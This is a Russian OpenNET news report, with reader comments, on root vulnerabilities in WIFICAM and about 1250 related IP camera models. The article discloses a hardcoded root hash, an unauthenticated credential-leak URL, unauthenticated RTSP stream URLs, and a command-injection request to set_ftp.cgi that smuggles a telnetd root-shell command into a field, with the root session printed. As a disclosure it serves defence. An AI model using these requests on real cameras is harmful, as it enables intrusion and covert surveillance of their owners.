The OpenNET Project / Index page

[ новости/++ | форум | wiki | теги ]

11.03.2017 11:26  Более тысячи моделей IP-камер подвержены root-уязвимости

В результате изучения прошивки камеры Wireless IP Camera (P2P) WIFICAM была выявлена возможность удалённого доступа к устройству с правами root, используя жестко прописанный в прошивке пароль. Более детальный разбор показал, что в прошивке также присутствуют и другие уязвимости, позволяющие выполнить свой код с правами root, в том числе обнаружена уязвимость в http-сервере GoAhead, который используется многими другими производителями IP-камер.

Так как камера Wireless IP Camera (P2P) WIFICAM построена на типовой платформе, на основе которой выпускаются многие другие модели IP-камер, некоторые уязвимости проявляются и в моделях других производителей. В сумме проблемам оказались подвержены около 1250 различных моделей камер. Сканирование сети через севис Shodan выявило более 185 тысяч уязвимых устройств. Миллионы камер во внутренних подсетях потенциально уязвимы для атак через облачную инфраструктуру.

Среди уязвимых отмечены некоторых модели камер 3com, 7Links, A4Tech, APKLINK, AQUILA, AVACOM, Acromedia, Agasio, Airsight, Alecto, Allnet, Apexis, Atheros, Bionics, Chinavasion, D-Link, Dericam, EST, EasyCam, EasyN, Elro, EyeCam, Foscam, GoAhead, Heden, iView ,ICam, Kogan, LifeTech, Logitech, Maginon, Mediatech, Netcam, Pixpo, Polariod, Provision, Pyle, Scricam, skylink, Skytronic, SmartEye, Sricam, Sricctv, StarCam, Sumpple, Suneyes, Supra+Space, Swann, Techview, Tenvis, Vantech, Vstarcam, Wanscam, Wansview, X10 и т.д.

Выявленные уязвимости:

  • В прошивке определён фиксированный пароль root ("root:$1$ybdHbPDn$ii9aEIFNiolBbM9QxW9mr0:0:0::/root:/bin/sh") и по умолчанию запущен сервис "telnetd". Для входа с правами root достаточно подобрать пароль по хэшу и подключиться при помощи telnet;
  • В прошивке сохранён закрытый RSA-ключ для Apple Production iOS Push Services (/system/www/pem/ck.pem);
  • Утечка информации в http-сервере GoAhead, позволяющая получить информацию об учётных записях. Параметры доступа сохраняются в файлах system.ini и system-b.ini, на которые присутствуют символические ссылки из директории для отдачи данных в Web. Из-за ошибки, в отличии от cgi-скриптов, требующих аутентификации, к файлам можно обратиться без аутентификации, указав пустые логин и пароль. Например, для получения параметров входа достаточно запросить файл "http://192.168.1.1/system.ini?loginuse&loginpas";
  • Через манипуляции со скриптом set_ftp.cgi, предназначенным для настройки доступа по FTP, можно выполнить произвольную команду с правами root через подстановку shell-конструкции "$(...)". Например, для запуска процесса telnetd для входа без пароля можно выполнить:
    
       $ wget -qO- 'http://192.168.1.1/set_ftp.cgi?next_url=ftp.htm&loginuse=admin&loginpas=admin&svr=192.168.1.1&port=21&user=ftp&pwd=$(telnetd -p25 -l/bin/sh)&dir=/&mode=PORT&upload_interval=0'
    
       $ wget -qO- 'http://192.168.1.1/ftptest.cgi?next_url=test_ftp.htm&loginuse=admin&loginpas=admin'
    
       $ telnet 192.168.1.107 25
       Trying 192.168.1.107...
       Connected to 192.168.1.107.
       Escape character is '^]'.
    
       / # id
       uid=0(root) gid=0
    
    

    Комбинируя данную уязвимость с утечкой параметров аутентификации, можно обеспечить удалённый вход на камеру с правами root. Для упрощения проведения атаки и организации обратного канала связи для обхода межсетевого экрана подготовлен универсальный эксплоит.

  • Возможность просмотра передаваемых камерой видеоматериалов без аутентификации. Для просмотра достаточно обратиться к TCP-порту 10554 по протоколу RTSP, например "vlc rstp://192.168.1.1:10554/tcp/av0_1" или "vlc rstp://192.168.1.1:10554/tcp/av0_0";
  • По умолчанию камера обеспечивает работу с облачными сервисами, что позволяет использовать мобильные приложения для управления камерой, размещённой за транслятором адресов или межсетевым экраном. По умолчанию камера периодически отправляет UDP-пакеты к сервисам www.baidu.com, openapi.xg.qq.com и ряду жестко прошитых IP-адресов. Протокол взаимодействия с облачными сервисами достаточно простой и не использует шифрование. В качестве идентификатора для подключения к камере через облачную сеть используется серийный номер, что позволяет зная или подобрав серийный номер, подключиться к камере во внутренней подсети, к которой нет прямого доступа из интернет.

Дополнительно можно отметить выявленную другими исследователями уязвимость в CCTV и IP-камерах компании Dahua Techology. Уязвимость позволяет внешнему неаутентифицируемому атакующему загрузить содержимое базы с именами и паролями пользователей устройства, в том числе учётной записью администратора. Атака сводится к загрузке файла с учётными записями и входу на устройство с полученными параметрами администратора. Рабочий эксплоит планируется опубликовать 5 апреля, дав пользователям время на установку обновления.

  1. Главная ссылка к новости (https://pierrekim.github.io/bl...)
  2. OpenNews: Выявлен метод получения root-доступа на цифровую камеру Samsung NX-300, основанную на Tizen
  3. OpenNews: Зафиксирована атака с подстановкой бэкдора в маршрутизаторы Cisco
  4. OpenNews: Волна атак на клиентские маршрутизаторы
  5. OpenNews: Легко эксплуатируемая критическая уязвимость в маршрутизаторах Netgear
  6. OpenNews: В маршрутизаторах Netgear выявлена уязвимость, позволяющая узнать пароль входа
Лицензия: CC-BY
Тип: Проблемы безопасности
Ключевые слова: ipcamera, security
При перепечатке указание ссылки на opennet.ru обязательно
Обсуждение Линейный вид | Ajax | Показать все | RSS
 
  • 1.1, Аноним, 20:57, 11/03/2017 [ответить] [смотреть все]
  • +5 +/
    Богата земля китайская дырявыми устройствами
     
     
  • 2.6, Аноним, 22:12, 11/03/2017 [^] [ответить] [смотреть все] [показать ветку]
  • +6 +/
    Да это вполне ожидаемо, если учесть, что так называемые эмбеддеры, разрабатывающие данные устройства, сидят под вантузом, запуская gcc.exe и ld.so.exe. Отсутствие личной гигиены - одна из основных проблем.
     
     
  • 3.7, Аноним, 22:34, 11/03/2017 [^] [ответить] [смотреть все]
  • –3 +/
    может по тому что ленятся модифицировать референс код Да и дорого это для ус... весь текст скрыт [показать]
     
     
  • 4.24, Аноним, 10:48, 12/03/2017 [^] [ответить] [смотреть все]  
  • +1 +/
    Лучше бы они этого не делали, ибо см. выше.
     
  • 3.38, Аноним, 20:18, 12/03/2017 [^] [ответить] [смотреть все]  
  • +1 +/
    > ld.so.exe

    o_O

     
     
  • 4.44, нежданчик, 04:58, 13/03/2017 [^] [ответить] [смотреть все]  
  • +1 +/
    ГЫ-ксперт в наличии =)
     
  • 2.46, Sen, 11:03, 13/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • –1 +/
    А россейская вечно недовольными коментаторами-бездельниками...
     
  • 1.2, Аноним, 20:59, 11/03/2017 [ответить] [смотреть все]  
  • +1 +/
    А почему д этого комментарии не отправлялись?
     
     
  • 2.5, Аноним, 22:09, 11/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +1 +/
    Наверное боялись, что работники гетиша dahua сольют o dahua.
     
  • 1.3, Аноним, 21:28, 11/03/2017 [ответить] [смотреть все]  
  • +21 +/
    > Dahua Techology
    > DahuaSecurity.com

    Даже добавить нечего.

     
     
  • 2.18, Аноним, 01:40, 12/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    >http-сервере GoAhead
    >GoAhead
    >уязвимость
     
  • 1.8, DeerFriend, 22:54, 11/03/2017 [ответить] [смотреть все]  
  • +1 +/
    А есть для таких камер аналоги опенврт?
     
     
  • 2.28, AlexYeCu, 13:56, 12/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • –1 +/
    Raspberry или другой SoC хоть родная камера, хоть вебка В принципе, что-то мо... весь текст скрыт [показать] [показать ветку]
     
  • 2.40, Michael Shigorin, 21:02, 12/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    Хозяйке на заметку https packages altlinux org vargus чтоб хоть это не изобр... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.68, DeerFriend, 21:19, 14/03/2017 [^] [ответить] [смотреть все]  
  • +/
    Я не понимать, как этот vargus можно установить на видеокамеру Вопрос был о про... весь текст скрыт [показать]
     
     
  • 4.69, Michael Shigorin, 21:24, 14/03/2017 [^] [ответить] [смотреть все]  
  • +/
    > Вопрос был о прошивке для камер

    Не, это не прошивка...

     
  • 1.9, Sabakwaka, 23:12, 11/03/2017 [ответить] [смотреть все]  
  • –1 +/
    Удаленный вход по 192.168.х.х?

    Это ж убиться насмерть надо, чтобы свою IP камеру в Сеть показать!

     
     
  • 2.10, XoRe, 23:49, 11/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +4 +/
    Вы даже не представляете, сколько их ... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.23, user, 05:16, 12/03/2017 [^] [ответить] [смотреть все]  
  • +/
    Смерть приватности как камеры слежения становятся игрушкой хакеров http www b... весь текст скрыт [показать]
     
  • 2.11, Анон_, 23:51, 11/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +3 +/
    убьешься ты, наоборот, городить защищенную сеть для своих ip-камер В случае, ... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.15, Sabakwaka, 00:52, 12/03/2017 [^] [ответить] [смотреть все]  
  • +3 +/
    171 Сеть для своих камер 187 , простите, должна быть локальной и приезжать ви... весь текст скрыт [показать]
     
     
  • 4.19, Crazy Alex, 02:09, 12/03/2017 [^] [ответить] [смотреть все]  
  • –5 +/
    Затем, что это может быть куча расположенных в различных местах городах странах ... весь текст скрыт [показать]
     
     
  • 5.27, YetAnotherOnanym, 13:46, 12/03/2017 [^] [ответить] [смотреть все]  
  • +4 +/
    Например, затем, чтобы злоумышленник, планирующий ограбление склада, не мог пров... весь текст скрыт [показать]
     
     
  • 6.43, Crazy Alex, 01:14, 13/03/2017 [^] [ответить] [смотреть все]  
  • +/
    Оценивать надо Подозреваю, что оно того не окупит По нынешним временам злоум... весь текст скрыт [показать]
     
  • 4.22, _, 04:08, 12/03/2017 [^] [ответить] [смотреть все]  
  • –1 +/
    192 168 0 0 16 Ыгсперт Д,Б - ... весь текст скрыт [показать]
     
     
  • 5.29, Sabakwaka, 14:40, 12/03/2017 [^] [ответить] [смотреть все]  
  • +/
    24, кловун, 24 ... весь текст скрыт [показать]
     
  • 5.41, Michael Shigorin, 21:02, 12/03/2017 [^] [ответить] [смотреть все]  
  • +/
    Зачем вся 16-то ... весь текст скрыт [показать]
     
     
  • 6.45, тигар, 09:09, 13/03/2017 [^] [ответить] [смотреть все]  
  • +1 +/
    потому что CIDR 192 168 24 немножко invalid думаю, что именно на это намекали ... весь текст скрыт [показать]
     
     
  • 7.47, Michael Shigorin, 12:02, 13/03/2017 [^] [ответить] [смотреть все]  
  • +/
    Я прочёл как any практически на автомате ... весь текст скрыт [показать]
     
  • 4.62, Анон_, 20:30, 13/03/2017 [^] [ответить] [смотреть все]  
  • +/
    кому должна - админу локалхоста Целых две камеры, одна в домофоне, вторая в сор... весь текст скрыт [показать]
     
  • 2.34, Аноним, 17:53, 12/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    Дело в том, что они не в курсе про то что они в интернете видны Проблема в скрв... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.37, Sabakwaka, 18:34, 12/03/2017 [^] [ответить] [смотреть все]  
  • +/
    И кто же дарит им услуги DNS Где это место Дайте два ... весь текст скрыт [показать]
     
  • 2.48, Аноним, 12:44, 13/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    Они сильно умные облачные теперь, и могут нетривиальными способами к нему коннек... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.49, Аноним, 12:45, 13/03/2017 [^] [ответить] [смотреть все]  
  • +/
    вплоть до коннекта к ней через wifi соседа ... весь текст скрыт [показать]
     
  • 3.57, Sabakwaka, 17:59, 13/03/2017 [^] [ответить] [смотреть все]  
  • +/
    Хто платит за DNS Почему мне не бесплатно, а им нахаляву ... весь текст скрыт [показать]
     
     
  • 4.63, Анон_, 20:33, 13/03/2017 [^] [ответить] [смотреть все]  
  • +/
    потому что ты поленился погуглить дальше первых двух строчек, а там уже действит... весь текст скрыт [показать]
     
     ....нить скрыта, показать (19)

  • 1.12, incker, 00:10, 12/03/2017 [ответить] [смотреть все]  
  • +/
    А я не так давно ржал, что последнем в фильме Форсаж хакают камеры.
    Еще от части напомнило игру watch dogs (кажется так называется)
     
  • 1.13, Аноним, 00:13, 12/03/2017 [ответить] [смотреть все]  
  • +/
    как правило установщики этих камер по всей нашей стране, люди неквалифицированны... весь текст скрыт [показать]
     
  • 1.14, Ilya Indigo, 00:19, 12/03/2017 [ответить] [смотреть все]  
  • +1 +/
    Я в шоке от кол-ва зондов одновременно, на любой вкус у такого внушительного кол-ва производителей.
     
     
  • 2.16, Sabakwaka, 00:56, 12/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • –3 +/
    Никто не предполагает, что существуют мурзилы, прокидывающие камеры в Интернет ... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.39, Аноним, 20:26, 12/03/2017 [^] [ответить] [смотреть все]  
  • +1 +/
    Если бы даже это было и так а это не так, см документацию любой IP-камеры , чт... весь текст скрыт [показать]
     
     
  • 4.59, Аноним, 18:50, 13/03/2017 [^] [ответить] [смотреть все]  
  • +1 +/
    Сэр, это старая традиция подоконников!
     
  • 3.51, tonys, 13:06, 13/03/2017 [^] [ответить] [смотреть все]  
  • +/
    Неправда Все производители камер видеонаблюдения как раз и расхваливают фичу уд... весь текст скрыт [показать]
     
  • 1.17, Аноним, 01:18, 12/03/2017 [ответить] [смотреть все]  
  • +/
    rtsp может всё таки в VLC открывать?
    (real time streaming protocol)
     
     
  • 2.35, Аноним, 17:55, 12/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    Не тут как выяснилось RTSP не мапит локальный сервис UPnP так что только HTTP ... весь текст скрыт [показать] [показать ветку]
     
  • 1.20, Черный Властелин, 03:29, 12/03/2017 [ответить] [смотреть все]  
  • +2 +/
    IoT во все поля
     
     
  • 2.32, Аноним, 16:24, 12/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +1 +/
    > IoT во все поля

    Пока что просто демка.


     
  • 1.21, Аноним, 03:44, 12/03/2017 [ответить] [смотреть все]  
  • +/
    можно подсматривать как набирают пароли в танчики
     
  • 1.25, бедный буратино, 13:04, 12/03/2017 [ответить] [смотреть все]  
  • +/
    а где сам пароль?
    а где ссылки на интересные стримы?
     
     
  • 2.30, Антон, 14:51, 12/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • –1 +/
    на дваче
     
     
  • 3.42, Аноним, 21:10, 12/03/2017 [^] [ответить] [смотреть все]  
  • +3 +/
    > Server not found
    > Firefox can't find the server at 2ch.ru.
     
     
  • 4.58, Аноним, 18:34, 13/03/2017 [^] [ответить] [смотреть все]  
  • +/
    Goodnight, sweet prince.
     
  • 3.60, Аноним, 18:51, 13/03/2017 [^] [ответить] [смотреть все]  
  • +/
    НСБ!
     
  • 1.26, Аноним, 13:11, 12/03/2017 [ответить] [смотреть все]  
  • –1 +/
    Сколько-сколько А почему в DNS_е через дорогу не продают ни одной Посоветуйте ... весь текст скрыт [показать]
     
     
  • 2.31, name, 15:49, 12/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    Только у них через интернет https play google com store apps details id smile ... весь текст скрыт [показать] [показать ветку]
     
  • 2.33, AlexYeCu, 17:31, 12/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +1 +/
    Экий ты затейник Пожалуй, послежу за веткой 8212 вдруг кто чего дельного при... весь текст скрыт [показать] [показать ветку]
     
  • 2.36, Аноним, 17:57, 12/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +2 +/
    вы ТЗ не туда отправили надо в китай слать там все бракоделы ... весь текст скрыт [показать] [показать ветку]
     
  • 1.54, Аномномномнимус, 13:47, 13/03/2017 [ответить] [смотреть все]  
  • +/
    А подсоветуйте какой софт к этим "широко распространённым" камерам, чтобы можно было ими вертеть, ночной/дневной режим переключать и микрофон юзать? А то у них либо надо ставить какой-то шлак для IE (что уже абсурдно), либо ставить прилагу из плеймаркета гуглового на смартфон. В остальных вариантах оный функционал не работает
     
     
  • 2.61, Uopwd, 19:14, 13/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • –2 +/
    шлак под IE работает как надо, и микрофон и динамики, и практически всё остально... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.66, Аномномномнимус, 23:27, 13/03/2017 [^] [ответить] [смотреть все]  
  • +/
    Нет. Нормально, из того что опробовано, работает только андроидное приложение.
     
  • 2.70, Андрей, 23:24, 14/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    У beward'a вроде есть подобные приложения
     
  • 1.72, Аноним, 13:28, 20/03/2017 [ответить] [смотреть все]  
  • +/
    Как эксплоит-то запустить, Бэтмэны ?
     

     Добавить комментарий
    Имя:
    E-Mail:
    Заголовок:
    Текст:


      Закладки на сайте
      Проследить за страницей
    Created 1996-2017 by Maxim Chirkov  
    ДобавитьРекламаВебмастеруГИД  
    Hosting by Ihor